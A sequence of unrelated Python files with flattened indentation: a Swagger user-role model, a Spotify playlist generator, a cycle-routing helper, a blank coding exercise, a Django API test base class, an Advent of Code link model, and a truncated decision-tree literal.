'granted_space_permissions': 'GrantedSpacePermissions',
'granted_system_permissions': 'GrantedSystemPermissions',
'can_be_deleted': 'CanBeDeleted',
'last_modified_on': 'LastModifiedOn',
'last_modified_by': 'LastModifiedBy',
'links': 'Links'
}
def __init__(self, id=None, name=None, description=None, supported_restrictions=None, space_permission_descriptions=None, system_permission_descriptions=None, granted_space_permissions=None, granted_system_permissions=None, can_be_deleted=None, last_modified_on=None, last_modified_by=None, links=None): # noqa: E501
"""UserRoleResource - a model defined in Swagger""" # noqa: E501
self._id = None
self._name = None
self._description = None
self._supported_restrictions = None
self._space_permission_descriptions = None
self._system_permission_descriptions = None
self._granted_space_permissions = None
self._granted_system_permissions = None
self._can_be_deleted = None
self._last_modified_on = None
self._last_modified_by = None
self._links = None
self.discriminator = None
if id is not None:
self.id = id
if name is not None:
self.name = name
if description is not None:
self.description = description
if supported_restrictions is not None:
self.supported_restrictions = supported_restrictions
if space_permission_descriptions is not None:
self.space_permission_descriptions = space_permission_descriptions
if system_permission_descriptions is not None:
self.system_permission_descriptions = system_permission_descriptions
if granted_space_permissions is not None:
self.granted_space_permissions = granted_space_permissions
if granted_system_permissions is not None:
self.granted_system_permissions = granted_system_permissions
if can_be_deleted is not None:
self.can_be_deleted = can_be_deleted
if last_modified_on is not None:
self.last_modified_on = last_modified_on
if last_modified_by is not None:
self.last_modified_by = last_modified_by
if links is not None:
self.links = links
@property
def id(self):
"""Gets the id of this UserRoleResource. # noqa: E501
:return: The id of this UserRoleResource. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this UserRoleResource.
:param id: The id of this UserRoleResource. # noqa: E501
:type: str
"""
self._id = id
@property
def name(self):
"""Gets the name of this UserRoleResource. # noqa: E501
:return: The name of this UserRoleResource. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this UserRoleResource.
:param name: The name of this UserRoleResource. # noqa: E501
:type: str
"""
self._name = name
@property
def description(self):
"""Gets the description of this UserRoleResource. # noqa: E501
:return: The description of this UserRoleResource. # noqa: E501
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this UserRoleResource.
:param description: The description of this UserRoleResource. # noqa: E501
:type: str
"""
self._description = description
@property
def supported_restrictions(self):
"""Gets the supported_restrictions of this UserRoleResource. # noqa: E501
:return: The supported_restrictions of this UserRoleResource. # noqa: E501
:rtype: list[str]
"""
return self._supported_restrictions
@supported_restrictions.setter
def supported_restrictions(self, supported_restrictions):
"""Sets the supported_restrictions of this UserRoleResource.
:param supported_restrictions: The supported_restrictions of this UserRoleResource. # noqa: E501
:type: list[str]
"""
self._supported_restrictions = supported_restrictions
@property
def space_permission_descriptions(self):
"""Gets the space_permission_descriptions of this UserRoleResource. # noqa: E501
:return: The space_permission_descriptions of this UserRoleResource. # noqa: E501
:rtype: list[str]
"""
return self._space_permission_descriptions
@space_permission_descriptions.setter
def space_permission_descriptions(self, space_permission_descriptions):
"""Sets the space_permission_descriptions of this UserRoleResource.
:param space_permission_descriptions: The space_permission_descriptions of this UserRoleResource. # noqa: E501
:type: list[str]
"""
self._space_permission_descriptions = space_permission_descriptions
@property
def system_permission_descriptions(self):
"""Gets the system_permission_descriptions of this UserRoleResource. # noqa: E501
:return: The system_permission_descriptions of this UserRoleResource. # noqa: E501
:rtype: list[str]
"""
return self._system_permission_descriptions
@system_permission_descriptions.setter
def system_permission_descriptions(self, system_permission_descriptions):
"""Sets the system_permission_descriptions of this UserRoleResource.
:param system_permission_descriptions: The system_permission_descriptions of this UserRoleResource. # noqa: E501
:type: list[str]
"""
self._system_permission_descriptions = system_permission_descriptions
@property
def granted_space_permissions(self):
"""Gets the granted_space_permissions of this UserRoleResource. # noqa: E501
:return: The granted_space_permissions of this UserRoleResource. # noqa: E501
:rtype: list[str]
"""
return self._granted_space_permissions
@granted_space_permissions.setter
def granted_space_permissions(self, granted_space_permissions):
"""Sets the granted_space_permissions of this UserRoleResource.
:param granted_space_permissions: The granted_space_permissions of this UserRoleResource. # noqa: E501
:type: list[str]
"""
allowed_values = ["None", "AdministerSystem", "ProjectEdit", "ProjectView", "ProjectCreate", "ProjectDelete", "ProcessView", "ProcessEdit", "VariableEdit", "VariableEditUnscoped", "VariableView", "VariableViewUnscoped", "ReleaseCreate", "ReleaseView", "ReleaseEdit", "ReleaseDelete", "DefectReport", "DefectResolve", "DeploymentCreate", "DeploymentDelete", "DeploymentView", "EnvironmentView", "EnvironmentCreate", "EnvironmentEdit", "EnvironmentDelete", "MachineCreate", "MachineEdit", "MachineView", "MachineDelete", "ArtifactView", "ArtifactCreate", "ArtifactEdit", "ArtifactDelete", "FeedView", "EventView", "LibraryVariableSetView", "LibraryVariableSetCreate", "LibraryVariableSetEdit", "LibraryVariableSetDelete", "ProjectGroupView", "ProjectGroupCreate", "ProjectGroupEdit", "ProjectGroupDelete", "TeamCreate", "TeamView", "TeamEdit", "TeamDelete", "UserView", "UserInvite", "UserRoleView", "UserRoleEdit", "TaskView", "TaskCreate", "TaskCancel", "TaskEdit", "InterruptionView", "InterruptionSubmit", "InterruptionViewSubmitResponsible", "BuiltInFeedPush", "BuiltInFeedAdminister", "BuiltInFeedDownload", "ActionTemplateView", "ActionTemplateCreate", "ActionTemplateEdit", "ActionTemplateDelete", "LifecycleCreate", "LifecycleView", "LifecycleEdit", "LifecycleDelete", "AccountView", "AccountEdit", "AccountCreate", "AccountDelete", "TenantCreate", "TenantEdit", "TenantView", "TenantDelete", "TagSetCreate", "TagSetEdit", "TagSetDelete", "MachinePolicyCreate", "MachinePolicyView", "MachinePolicyEdit", "MachinePolicyDelete", "ProxyCreate", "ProxyView", "ProxyEdit", "ProxyDelete", "SubscriptionCreate", "SubscriptionView", "SubscriptionEdit", "SubscriptionDelete", "TriggerCreate", "TriggerView", "TriggerEdit", "TriggerDelete", "CertificateView", "CertificateCreate", "CertificateEdit", "CertificateDelete", "CertificateExportPrivateKey", "UserEdit", "ConfigureServer", "FeedEdit", "WorkerView", "WorkerEdit", "RunSystem", "SpaceEdit", "SpaceView", "SpaceDelete", "SpaceCreate", "PackageMetadataPush"] # noqa: E501
if not set(granted_space_permissions).issubset(set(allowed_values)):
raise ValueError(
"Invalid values for `granted_space_permissions` [{0}], must be a subset of [{1}]" # noqa: E501
.format(", ".join(map(str, set(granted_space_permissions) - set(allowed_values))), # noqa: E501
", ".join(map(str, allowed_values)))
)
self._granted_space_permissions = granted_space_permissions
@property
def granted_system_permissions(self):
"""Gets the granted_system_permissions of this UserRoleResource. # noqa: E501
:return: The granted_system_permissions of this UserRoleResource. # noqa: E501
:rtype: list[str]
"""
return self._granted_system_permissions
@granted_system_permissions.setter
def granted_system_permissions(self, granted_system_permissions):
"""Sets the granted_system_permissions of this UserRoleResource.
:param granted_system_permissions: The granted_system_permissions of this UserRoleResource. # noqa: E501
:type: list[str]
"""
allowed_values = ["None", "AdministerSystem", "ProjectEdit", "ProjectView", "ProjectCreate", "ProjectDelete", "ProcessView", "ProcessEdit", "VariableEdit", "VariableEditUnscoped", "VariableView", "VariableViewUnscoped", "ReleaseCreate", "ReleaseView", "ReleaseEdit", "ReleaseDelete", "DefectReport", "DefectResolve", "DeploymentCreate", "DeploymentDelete", "DeploymentView", "EnvironmentView", "EnvironmentCreate", "EnvironmentEdit", "EnvironmentDelete", "MachineCreate", "MachineEdit", "MachineView", "MachineDelete", "ArtifactView", "ArtifactCreate", "ArtifactEdit", "ArtifactDelete", "FeedView", "EventView", "LibraryVariableSetView", "LibraryVariableSetCreate", "LibraryVariableSetEdit", "LibraryVariableSetDelete", "ProjectGroupView", "ProjectGroupCreate", "ProjectGroupEdit", "ProjectGroupDelete", "TeamCreate", "TeamView", "TeamEdit", "TeamDelete", "UserView", "UserInvite", "UserRoleView", "UserRoleEdit", "TaskView", "TaskCreate", "TaskCancel", "TaskEdit", "InterruptionView", "InterruptionSubmit", "InterruptionViewSubmitResponsible", "BuiltInFeedPush", "BuiltInFeedAdminister", "BuiltInFeedDownload", "ActionTemplateView", "ActionTemplateCreate", "ActionTemplateEdit", "ActionTemplateDelete", "LifecycleCreate", "LifecycleView", "LifecycleEdit", "LifecycleDelete", "AccountView", "AccountEdit", "AccountCreate", "AccountDelete", "TenantCreate", "TenantEdit", "TenantView", "TenantDelete", "TagSetCreate", "TagSetEdit", "TagSetDelete", "MachinePolicyCreate", "MachinePolicyView", "MachinePolicyEdit", "MachinePolicyDelete", "ProxyCreate", "ProxyView", "ProxyEdit", "ProxyDelete", "SubscriptionCreate", "SubscriptionView", "SubscriptionEdit", "SubscriptionDelete", "TriggerCreate", "TriggerView", "TriggerEdit", "TriggerDelete", "CertificateView", "CertificateCreate", "CertificateEdit", "CertificateDelete", "CertificateExportPrivateKey", "UserEdit", "ConfigureServer", "FeedEdit", "WorkerView", "WorkerEdit", "RunSystem", "SpaceEdit", "SpaceView", "SpaceDelete", "SpaceCreate", "PackageMetadataPush"] # noqa: E501
if not set(granted_system_permissions).issubset(set(allowed_values)):
raise ValueError(
"Invalid values for `granted_system_permissions` [{0}], must be a subset of [{1}]" # noqa: E501
.format(", ".join(map(str, set(granted_system_permissions) - set(allowed_values))), # noqa: E501
", ".join(map(str, allowed_values)))
)
self._granted_system_permissions = granted_system_permissions
@property
def can_be_deleted(self):
"""Gets the can_be_deleted of this UserRoleResource. # noqa: E501
:return: The can_be_deleted of this UserRoleResource. # noqa: E501
:rtype: bool
"""
return self._can_be_deleted
@can_be_deleted.setter
def can_be_deleted(self, can_be_deleted):
"""Sets the can_be_deleted of this UserRoleResource.
:param can_be_deleted: The can_be_deleted of this UserRoleResource. # noqa: E501
:type: bool
"""
self._can_be_deleted = can_be_deleted
@property
def last_modified_on(self):
"""Gets the last_modified_on of this UserRoleResource. # noqa: E501
:return: The last_modified_on of this UserRoleResource. # noqa: E501
:rtype: datetime
"""
return self._last_modified_on
@last_modified_on.setter
def last_modified_on(self, last_modified_on):
"""Sets the last_modified_on of this UserRoleResource.
:param last_modified_on: The last_modified_on of this UserRoleResource. # noqa: E501
:type: datetime
"""
self._last_modified_on = last_modified_on
@property
def last_modified_by(self):
"""Gets the last_modified_by of this UserRoleResource. # noqa: E501
:return: The last_modified_by of this UserRoleResource. # noqa: E501
:rtype: str
"""
return self._last_modified_by
@last_modified_by.setter
def last_modified_by(self, last_modified_by):
"""Sets the last_modified_by of this UserRoleResource.
:param last_modified_by: The last_modified_by of this UserRoleResource. # noqa: E501
:type: str
"""
self._last_modified_by = last_modified_by
@property
def links(self):
"""Gets the links of this UserRoleResource. # noqa: E501
:return: The links of this UserRoleResource. # noqa: E501
:rtype: dict(str, str)
"""
return self._links
@links.setter
def links(self, links):
"""Sets the links of this UserRoleResource.
:param links: The links of this UserRoleResource. # noqa: E501
:type: dict(str, str)
"""
self._links = links
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(UserRoleResource, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UserRoleResource):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 17,703 | 5,248 |
"""
Does the legwork of searching for matching tracks.
Contains:
(1) Search functions:
- search_message
- search_spotipy
- search_db
- search_lookup
(2) String parsers (to clean title name):
- clean_title
- remove_punctuation
(3) Creates new Spotify playlist.
- create_playlist
"""
from typing import Any, List, Dict, Union
import os
import re
import sqlite3
import time
import spotipy
from spotipy.oauth2 import SpotifyOAuth
from announcer import MessageAnnouncer, format_sse
# Localhost URL to access the application; Flask runs on port 5000 by default
# Adapated from https://github.com/Deffro/statify/blob/dd15a6e70428bd36ecddb5d4a8ac3d82b85c9339/code/server.py#L553
CLIENT_SIDE_URL = "http://127.0.0.1"
PORT = 5000
# Get environment variables
SPOTIPY_CLIENT_ID = os.getenv("SPOTIPY_CLIENT_ID")
SPOTIPY_CLIENT_SECRET = os.getenv("SPOTIFY_CLIENT_SECRET")
SPOTIPY_REDIRECT_URI = f"{CLIENT_SIDE_URL}:{PORT}/callback"
SCOPE = "playlist-modify-public playlist-modify-private playlist-read-private"
# Set up Spotipy
sp = spotipy.Spotify(auth_manager = SpotifyOAuth(client_id = SPOTIPY_CLIENT_ID,
client_secret = SPOTIPY_CLIENT_SECRET,
redirect_uri = SPOTIPY_REDIRECT_URI,
scope = SCOPE,
))
# Create ('instantiate') a MessageAnnouncer object
announcer = MessageAnnouncer()
"""
(1) Search functions:
- search_message
- search_spotipy
- search_db
- search_lookup
"""
def search_message(message: str, max_search_length: int = 10,
query_lookup: Dict[str, list] = dict(), failed_queries: set = set()) -> List[Union[list, Any]]:
"""
search_message(message, max_search_length = 10)
Returns a list of song names (change to ids) matching the message.
Uses regex-style greedy search.
Song names will be limited to [max_search_length] words (default is 10, can
be adjusted.)
Returns songs from Spotify API via spotipy library; if not, checks
Spotify 1.2M songs dataset via an sqlite3 query.
Memoizes successful queries (to query_lookup) and failured queries (to
failed_queries).
https://www.kaggle.com/rodolfofigueroa/spotify-12m-songs
"""
# Split message into list of lower-case words
message = remove_punctuation(message.casefold()).split()
# Gets up to max_search_length words of message
query_length = min(max_search_length, len(message))
# List containing search functions to iterate over
search_functions = [
search_lookup,
search_spotipy,
search_db,
]
# Wait 0.2 seconds to ensure /creating has loaded
time.sleep(0.2)
# Splits query into prefix and suffix, decrementing prefix, until
# - prefix exactly matches a song
# - suffix can be expressed as a list of songs
for i in range(query_length):
prefix, suffix = message[:query_length - i], message[query_length - i:]
prefix, suffix = " ".join(prefix), " ".join(suffix)
announcer.announce(format_sse(event = "add", data = prefix))
# Only search if suffix is not known to fail
if suffix in failed_queries:
time.sleep(0.1)
announcer.announce(format_sse(event = "drop", data = prefix))
continue # back to the start of the 'for' loop
# Looping through search functions,
for search_function in search_functions:
# Search for tracks matching prefix
prefix_results = search_function(prefix, query_lookup = query_lookup)
if prefix_results:
query_lookup[prefix] = prefix_results
print(f"Try: {prefix} in {search_function.__name__.replace('search_', '')}")
# In announcer: replace prefix, add each track in prefix_results
announcer.announce(format_sse(event = "drop", data = prefix))
for track in map(lambda tracks: tracks[0]["name"], prefix_results):
announcer.announce(format_sse(event = "add", data = remove_punctuation(clean_title(track.casefold()))))
time.sleep(0.1)
# Base case: if prefix is whole message, suffix == "", so we should just return prefix
if suffix == "":
print(f"All done!")
announcer.announce(format_sse(event = "lock in"))
return prefix_results
# Recursive case: make sure suffix it can be split into songs as well
suffix_results = search_message(suffix, max_search_length = max_search_length,
query_lookup = query_lookup, failed_queries = failed_queries)
# If both are valid, return joined list
if suffix_results:
results = prefix_results + suffix_results
query_lookup[" ".join([prefix, suffix])] = results
return results
# Suffix cannot be split into songs, drop prefix
for track in map(lambda tracks: tracks[0]["name"], prefix_results):
announcer.announce(format_sse(event = "drop", data = remove_punctuation(clean_title(track.casefold()))))
time.sleep(0.1)
print(f"\"{suffix}\" suffix can't be split.")
break # suffix doesn't work, try next prefix-suffix pair
# Prefix not found in all search functions, drop it
else:
print(f"\"{prefix}\" doesn't work, moving on.")
announcer.announce(format_sse(data = "prefix doesn't work, dropping it"))
announcer.announce(format_sse(event = "drop", data = prefix))
# Recursive case: failure
failed_queries.add(" ".join(message))
return []
def search_lookup(query: str, query_lookup: Dict[str, list]) -> list:
"""
Checks query_lookup (a dictionary created at the initial function call
of search_message) and returns the results of the query if it has
already been found.
"""
# Checks query_lookup dict
if query in query_lookup:
return query_lookup[query]
else:
return []
def search_spotipy(query: str, query_lookup: Dict[str, list]) -> list:
"""
Uses Spotify API via spotipy library to return a list of songs (name
& id) which match the query.
Note: the query_lookup parameter is not used. It is only included
in the definition because query_lookup is passed to search_functions.
"""
# Attributes to return
attributes = ["name", "id"]
# Search for tracks where the name matches query
results = sp.search(q=f"track:\"{query}\"", type="track", limit=50)
results = results["tracks"]["items"]
results = [{ attr: item[attr] for attr in attributes } for item in results if remove_punctuation(clean_title(item["name"].casefold())) == remove_punctuation(query)]
# If no results, return empty list:
if results == []:
return []
else:
return [results]
def search_db(query: str, query_lookup: Dict[str, list]) -> list:
"""
Searches tracks.db (1.2 million songs from Spotify from the Kaggle
database) to return a list of songs (name & id) which match the
query.
https://www.kaggle.com/rodolfofigueroa/spotify-12m-songs
"""
# Import sqlite database
tracks = sqlite3.connect("tracks.db")
db = sqlite3.Cursor(tracks)
# SQLite3 query
results = db.execute("SELECT name, id FROM tracks WHERE name_cleaned = ?", [remove_punctuation(query)]).fetchall()
results = list(map(lambda item: {
"name": item[0],
"id": item[1],
}, results))
# If no results, return empty list
if results == []:
return []
else:
return [results]
"""
(2) String parsers (to clean title name):
- clean_title
- remove_punctuation
"""
def clean_title(title):
"""
Cleans title by performing the following transformations in order:
- Remove substrings enclosed in (...) or [...] and preceding whitespace (using regex greedy matching)
- Remove " - " and substring after
- Remove " feat.", " ft(.)", or " featuring" and substring after
https://stackoverflow.com/questions/14596884/remove-text-between-and
"""
# (Greedy) replace substrings between (...) and []
title = re.sub(r"\s+\(.+\)", "", title)
title = re.sub(r"\s+\[.+\]", "", title)
# Remove " - " and subsequent substring
title = re.sub(r" - .*", "", title)
# Remove " feat(.) ", " ft(.) ", or " featuring " (but not "feature") and substring after
title = re.sub(r"\W+(ft[:.]?|feat[:.]|featuring)\s.*", "", title)
return title
def remove_punctuation(title):
"""
Removes punctuation by performing the following transformations:
- Delete XML escape sequences: & " < > '
- Replace "/", "//", etc. and surrounding whitespace with " " (in medley titles)
- Replace "&" and surrounding whitespace with " and "
- Remove the following characters from the string: !"#$%'‘’“”()*+,-.:;<=>?@[\]^_—`{|}~
- Strips surrounding whitespace
"""
title = re.sub(r"&[amp|quot|lt|gt|apos];", "", title)
title = re.sub(r"\s*\/+\s*", " ", title)
title = re.sub(r"\s*&\s*", " and ", title)
title = re.sub(r"[!\"#$%'‘’“”()*+,-.:;<=>?@[\\\]^_—`{|}~]", "", title)
title = re.sub(r"\s{2,}", " ", title)
return title.strip()
"""
(3) Creates new Spotify playlist.
"""
def create_playlist(results):
"""
Takes the result of search_message as input.
Constructs a playlist (via the spotipy library).
Returns the Spotify id of the playlist.
"""
# Process items
items = list(map(lambda songs: songs[0]["id"], results))
# Create playlist
playlist = sp.user_playlist_create(
user=sp.me()["id"],
name="mixtape50",
public=False,
collaborative=False,
description="Created with Mixtape50: https://github.com/jchanke/mixtape50."
)
sp.playlist_add_items(playlist_id=playlist["id"], items=items)
return playlist["id"] | 10,163 | 3,156 |
from urllib import urlencode
from urllib2 import urlopen
import simplejson
from django.conf import settings
from django.contrib.gis.geos import Point, LineString
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
from molly.apps.places.models import bearing_to_compass
from molly.utils.templatetags.molly_utils import humanise_distance, humanise_seconds
CYCLESTREETS_URL = 'http://www.cyclestreets.net/api/journey.json?%s'
if 'cyclestreets' not in settings.API_KEYS:
# Cyclestreets not configured
raise ImportError()
def generate_route(points, type):
"""
Given 2 Points, this will return a route between them. The route consists
of a dictionary with the following keys:
* error (optional, and if set means that the object contains no route),
which is a string describing any errors that occurred in plotting the
route
* total_time: An int of the number of seconds this route is estimated to
take
* total_distance: An int of the number of metres this route is expected to
take
* waypoints: A list of dictionaries, where each dictionary has 2 keys:
'instruction', which is a human-readable description of the steps to be
taken here, and 'location', which is a Point describing the route to be
taken
@param points: An ordered list of points to be included in this route
@type points: [Point]
@param type: The type of route to generate (foot, car or bike)
@type type: str
@return: A dictionary containing the route and metadata associated with it
@rtype: dict
"""
# Build Cyclestreets request:
url = CYCLESTREETS_URL % urlencode({
'key': settings.API_KEYS['cyclestreets'],
'plan': 'balanced',
'itinerarypoints': '|'.join('%f,%f' % (p[0], p[1]) for p in points)
})
json = simplejson.load(urlopen(url))
if not json:
return {
'error': _('Unable to plot route')
}
else:
summary = json['marker'][0]['@attributes']
waypoints = []
for i, waypoint in enumerate(json['marker'][1:]):
segment = waypoint['@attributes']
waypoints.append({
'instruction': _('%(instruction)s at %(name)s') % {
'instruction': capfirst(segment['turn']),
'name': segment['name']
},
'additional': _('%(direction)s for %(distance)s (taking approximately %(time)s)') % {
'direction': bearing_to_compass(int(segment['startBearing'])),
'distance': humanise_distance(segment['distance'], False),
'time': humanise_seconds(segment['time'])
},
'waypoint_type': {
'straight on': 'straight',
'turn left': 'left',
'bear left': 'slight-left',
'sharp left': 'sharp-left',
'turn right': 'right',
'bear right': 'slight-right',
'sharp right': 'sharp-right',
'double-back': 'turn-around',
}.get(segment['turn']),
'location': Point(*map(float, segment['points'].split(' ')[0].split(','))),
'path': LineString(map(lambda ps: Point(*map(float, ps.split(','))),
segment['points'].split(' ')))
})
return {
'total_time': summary['time'],
'total_distance': summary['length'],
'waypoints': waypoints,
'path': LineString(map(lambda ps: Point(*map(float, ps.split(','))), summary['coordinates'].split(' ')))
} | 3,836 | 1,051 |
num_list = [10,50,30,12,6,8,100]
def max_min_first_last(nlist):
____________________ # Maximum number
____________________ # Minimum number
____________________ # First number
____________________ # Last number
return _____________________________________
print( max_min_first_last(num_list) )
| 316 | 99 |
# MIT License
# Copyright (c) 2017 MassChallenge, Inc.
import json
from oauth2_provider.models import get_application_model
from rest_framework.test import APIClient
from test_plus.test import TestCase
from django.core import mail
from django.conf import settings
from django.contrib.auth.models import Group
from django.urls import reverse
from accelerator_abstract.models.base_clearance import (
CLEARANCE_LEVEL_GLOBAL_MANAGER,
CLEARANCE_LEVEL_STAFF
)
from impact.tests.factories import (
ClearanceFactory,
UserFactory,
)
OAuth_App = get_application_model()
API_GROUPS = [settings.V0_API_GROUP, settings.V1_API_GROUP]
DESCRIPTION_CONTENT = 'DESCRIPTION:Topics: {topics}'
LOCATION_CONTENT = 'LOCATION:{location}\\;'
LOCATION_INFO = 'LOCATION:{location}\\;{meeting_info}'
class APITestCase(TestCase):
SOME_SITE_NAME = "somesite.com"
_user_count = 0
client_class = APIClient
user_factory = UserFactory
@classmethod
def setUpClass(cls):
[Group.objects.get_or_create(name=name) for name in API_GROUPS]
@classmethod
def tearDownClass(cls):
[Group.objects.get(name=name).delete() for name in API_GROUPS]
def basic_user(self):
user = self.make_user('basic_user{}@test.com'.format(self._user_count),
perms=["mc.view_startup"])
self._user_count += 1
for group in Group.objects.filter(name__in=API_GROUPS):
user.groups.add(group)
user.set_password('password')
user.save()
return user
def staff_user(self, program_family=None, level=CLEARANCE_LEVEL_STAFF):
user = self.make_user('basic_user{}@test.com'.format(self._user_count))
self._user_count += 1
kwargs = {"level": level,
"user": user}
if program_family:
kwargs['program_family'] = program_family
clearance = ClearanceFactory(**kwargs)
return clearance.user
def global_operations_manager(self, program_family):
user = self.staff_user()
ClearanceFactory(user=user,
level=CLEARANCE_LEVEL_GLOBAL_MANAGER,
program_family=program_family)
return user
def get_access_token(self, user):
app = OAuth_App.objects.create(
user=user,
name="Test666",
client_type=OAuth_App.CLIENT_PUBLIC,
authorization_grant_type=OAuth_App.GRANT_PASSWORD,
redirect_uris="http://thirdparty.com/exchange/",
)
response = self.client.post(
self.reverse("oauth2_provider:token"),
data={
"password": 'password',
"client_id": app.client_id,
"username": user.username,
"grant_type": "password",
},
headers={'Content-Type': 'application/x-www-form-urlencoded'}
)
response_json = json.loads(response.content)
return response_json['access_token']
def assert_options_include(self, method, expected_options, object_id=None):
if object_id:
args = [object_id]
else:
args = []
url = reverse(self.view.view_name, args=args)
with self.login(email=self.basic_user().email):
response = self.client.options(url)
result = json.loads(response.content)
assert method in result['actions']
options = result['actions'][method]['properties']
for key, params in expected_options.items():
self.assertIn(key, options)
self.assertEqual(options[key], params)
def assert_ui_notification(self, response, success, notification):
data = response.data
detail = notification if notification else ""
header = self.success_header if success else self.fail_header
self.assertTrue(all([
data['success'] == success,
data['header'] == header,
data['detail'] == detail
]), msg='Notification data was not as expected')
def assert_notified(self,
user,
message="",
subject="",
check_alternative=False):
'''Assert that the user received a notification.
If `message` is specified, assert that the message appears in one of
the outgoing emails to this user
'''
emails = [email for email in mail.outbox if user.email in email.to]
self.assertGreater(len(emails), 0)
if message:
if check_alternative:
self.assertTrue(any([_message_included_in_email_alternative(
email, message) for email in emails]))
else:
self.assertTrue(any([
message in email.body for email in emails]))
if subject:
self.assertIn(subject, [email.subject for email in emails])
def assert_ics_email_attachments(self, user):
'''assert that the ics email attachment exists
'''
emails = [email for email in mail.outbox if user.email in email.to]
for email in emails:
attachments = email.attachments
self.assertGreater(len(email.attachments), 0)
self.assertIn("reminder.ics",
[attachment[0] for attachment in attachments])
def assert_not_notified(self, user):
'''Assert that the specified user did not receive a notification.
'''
if mail.outbox:
self.assertNotIn(user.email, [email.to for email in mail.outbox],
msg="Found an email sent to user")
def _message_included_in_email_alternative(email, message):
return any([message in alt[0] for alt in email.alternatives])
| 5,829 | 1,636 |
from django.db import models
from pydis_site.apps.api.models.bot.user import User
from pydis_site.apps.api.models.mixins import ModelReprMixin
class AocAccountLink(ModelReprMixin, models.Model):
"""An AoC account link for a Discord User."""
user = models.OneToOneField(
User,
on_delete=models.CASCADE,
help_text="The user that is blocked from getting the AoC Completionist Role",
primary_key=True
)
aoc_username = models.CharField(
max_length=120,
help_text="The AoC username associated with the Discord User.",
blank=False
)
| 607 | 195 |
import pickle
best_trees = [
{'accuracy': 0.36416184971098264, 'tree':
['Attribute', 'att1',
['Value', 'Pend Oreille',
['Leaf', 2.0, 0, 69]
],
['Value', 'Okanogan',
['Leaf', 3.0, 0, 314]
],
['Value', 'Lincoln',
['Leaf', 5.0, 0, 55]
],
['Value', 'Grant',
['Leaf', 5.0, 0, 4]
], ['Value', 'Chelan', ['Leaf', 3.0, 0, 136]], ['Value', 'Stevens', ['Attribute', 'att2', ['Value', 'Recreation', ['Leaf', 2.0, 0, 18]], ['Value', 'Miscellaneou', ['Leaf', 2.0, 0, 83]], ['Value', 'Lightning', ['Leaf', 2.0, 0, 43]], ['Value', 'Under Invest', ['Leaf', 5.0, 0, 6]], ['Value', 'Debris Burn', ['Leaf', 3.0, 0, 120]], ['Value', 'Children', ['Leaf', 3.0, 0, 8]], ['Value', 'None', ['Leaf', 5.0, 1, 308]], ['Value', 'Smoker', ['Leaf', 2.0, 0, 7]], ['Value', 'Logging', ['Leaf', 3.0, 0, 8]], ['Value', 'Arson', ['Leaf', 2.0, 0, 5]], ['Value', 'Undetermined', ['Leaf', 9.0, 2, 308]], ['Value', 'Railroad', ['Leaf', 4.0, 0, 7]]]], ['Value', 'Clark', ['Leaf', 3.0, 0, 20]], ['Value', 'Yakima', ['Leaf', 3.0, 0, 97]], ['Value', 'Spokane', ['Attribute', 'att2', ['Value', 'Recreation', ['Leaf', 2.0, 0, 23]], ['Value', 'Miscellaneou', ['Leaf', 2.0, 0, 142]], ['Value', 'Lightning', ['Leaf', 3.0, 0, 24]], ['Value', 'Under Invest', ['Leaf', 3.0, 0, 4]], ['Value', 'Debris Burn', ['Leaf', 2.0, 0, 54]], ['Value', 'Children', ['Leaf', 3.0, 0, 20]], ['Value', 'None', ['Leaf', 3.0, 3, 326]], ['Value', 'Smoker', ['Leaf', 2.0, 0, 2]], ['Value', 'Logging', ['Leaf', 2.0, 0, 3]], ['Value', 'Arson', ['Leaf', 2.0, 0, 29]], ['Value', 'Undetermined', ['Leaf', 2.0, 0, 7]], ['Value', 'Railroad', ['Leaf', 2.0, 0, 15]]]], ['Value', 'Pierce', ['Leaf', 3.0, 0, 55]], ['Value', 'Skagit', ['Leaf', 3.0, 0, 34]], ['Value', 'Grays Harbor', ['Leaf', 3.0, 0, 52]], ['Value', 'Skamania', ['Leaf', 3.0, 0, 28]], ['Value', 'King', ['Leaf', 3.0, 0, 41]], ['Value', 'Island', ['Leaf', 3.0, 0, 7]], ['Value', 'Klickitat', ['Leaf', 3.0, 0, 180]], ['Value', 'Whitman', ['Leaf', 7.0, 0, 5]], ['Value', 'Cowlitz', ['Leaf', 3.0, 0, 68]], ['Value', 'Douglas', ['Leaf', 5.0, 0, 27]], ['Value', 'Ferry', ['Leaf', 3.0, 0, 72]], ['Value', 'Mason', ['Leaf', 3.0, 0, 66]], ['Value', 'Kittitas', ['Leaf', 3.0, 0, 99]], ['Value', 'Jefferson', ['Leaf', 3.0, 0, 30]], ['Value', 'Franklin', ['Leaf', 5.0, 3, 2503]], ['Value', 'Clallam', ['Leaf', 3.0, 0, 44]], ['Value', 'Pacific', ['Leaf', 3.0, 0, 51]], ['Value', 'Lewis', ['Leaf', 3.0, 0, 93]], ['Value', 'Thurston', ['Leaf', 2.0, 0, 59]], ['Value', 'Walla Walla', ['Leaf', 3.0, 0, 18]], ['Value', 'Snohomish', ['Leaf', 3.0, 0, 38]], ['Value', 'Asotin', ['Leaf', 4.0, 0, 23]], ['Value', 'Adams', ['Leaf', 5.0, 1, 2503]], ['Value', 'Whatcom', ['Leaf', 2.0, 0, 40]], ['Value', 'San Juan', ['Leaf', 3.0, 0, 7]], ['Value', 'Garfield', ['Leaf', 3.0, 0, 10]], ['Value', 'Columbia', ['Leaf', 3.0, 0, 14]], ['Value', 'Benton', ['Leaf', 7.0, 1, 2503]], ['Value', 'Wahkiakum', ['Leaf', 3.0, 5, 2503]], ['Value', 'No Data', ['Leaf', 4.0, 1, 2503]], ['Value', 